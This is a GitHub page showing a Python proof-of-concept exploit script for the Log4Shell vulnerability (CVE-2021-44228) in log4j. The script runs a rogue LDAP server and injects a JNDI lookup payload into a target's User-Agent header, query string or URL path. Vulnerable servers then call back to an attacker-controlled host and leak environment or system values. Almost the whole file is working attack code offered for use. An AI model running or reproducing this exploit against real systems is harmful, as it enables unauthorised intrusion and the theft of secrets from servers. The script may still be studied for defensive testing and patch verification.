-
Notifications
You must be signed in to change notification settings - Fork 0
/
log4j_exp.py
120 lines (100 loc) · 4.75 KB
/
log4j_exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
#!/usr/bin/env python3
# Pure python ENV variable leak PoC for CVE-2021-44228
# 2021 @toxicenvelope
import argparse
import signal
import socketserver
import threading
import time
from urllib.parse import urljoin
import requests
LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a'
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self) -> None:
print(f' i| new connection from {self.client_address[0]}:{self.client_address[1]}')
sock = self.request
sock.recv(1024)
sock.sendall(LDAP_HEADER)
data = sock.recv(1024)
data = data[9:]
# example response
#
# ('Java version 11.0.13\n'
# '\x01\x00\n'
# '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b'
# 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2')
data = data.decode(errors='ignore').split('\n')[0]
print(f'[SDTOUT] extracted value: {data}')
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def menu_arguments():
parser = argparse.ArgumentParser(description='a simple log4j <=2.14 information disclosure poc '
'(ref: https://twitter.com/Black2Fan/status/1470281005038817284)')
parser.add_argument('--listen-host', default='0.0.0.0',
help='exploit server host to listen on (default: 127.0.0.1)')
parser.add_argument('--listen-port', '-lp', default=8888, help='exploit server port to listen on (default: 8888)')
parser.add_argument('--exploit-host', '-eh', required=True, default='127.0.0.1',
help='host where (this) exploit server is reachable')
parser.add_argument('--leak', '-l', default='${java:version}',
help='value to leak. '
'see: https://twitter.com/Rayhan0x01/status/1469571563674505217 '
'(default: ${java:version})')
parser.add_argument('--dump-resp', action='store_true', help='dump the http response body')
# payload types
parser.add_argument('--payload-all', '-pa', action='store_true', help='use the payload everywhere')
parser.add_argument('--payload-header', '-ph', action='store_true', default=True,
help='use the payload as the user-agent header')
parser.add_argument('--payload-query-string', '-pq', action='store_true',
help='use the payload as query string param')
parser.add_argument('--payload-path', '-pp', action='store_true', help='use the payload as part of the path')
parser.add_argument('--target', '-t', help='target uri')
parser.add_argument('--keep-alive', '-k', action='store_true', help='keep the exploit server alive')
return parser.parse_args()
def make_request(args, payload):
headers = {}
params = {}
target = args.target if args.target.endswith('/') else args.target + '/'
if args.payload_all or args.payload_header:
print(f'[INFO] setting payload in User-Agent header')
headers['User-Agent'] = payload
if args.payload_all or args.payload_query_string:
print(f'[INFO] setting payload as query string \'q\'')
params['q'] = payload
if args.payload_all or args.payload_path:
print(f'[INFO] setting payload as part of the uri path')
target = urljoin(target, payload)
print(f'[INFO] sending exploit payload {payload} to {target}')
try:
r = requests.get(args.target, headers=headers, params=params)
print(f'[INFO] request url was: {r.url}')
print(f'[INFO] response status code: {r.status_code}')
if args.dump_resp:
print(f'[INFO] response: {r.text}')
except Exception as e:
print(f'[ERROR] failed to make request: {e}')
def main():
args = menu_arguments()
# make sure we have something to do
if not (args.target or args.keep_alive):
print('[ERROR] specify at least one of --target/-t or --keep-alive/-k')
return
print(f'[INFO] starting server on {args.listen_host}:{args.listen_port}')
server = ThreadedTCPServer((args.listen_host, int(args.listen_port)), ThreadedTCPRequestHandler)
serv_thread = threading.Thread(target=server.serve_forever)
serv_thread.daemon = True
serv_thread.start()
time.sleep(1)
print(f'[INFO] server started')
payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}'
if args.target:
make_request(args=args, payload=payload)
# cleanup, we're done
if not args.keep_alive:
server.shutdown()
server.server_close()
return
print(f'[INFO] keeping exploit server alive')
print(f'[INFO] payload to use: {payload}')
signal.pause()
if __name__ == '__main__':
main()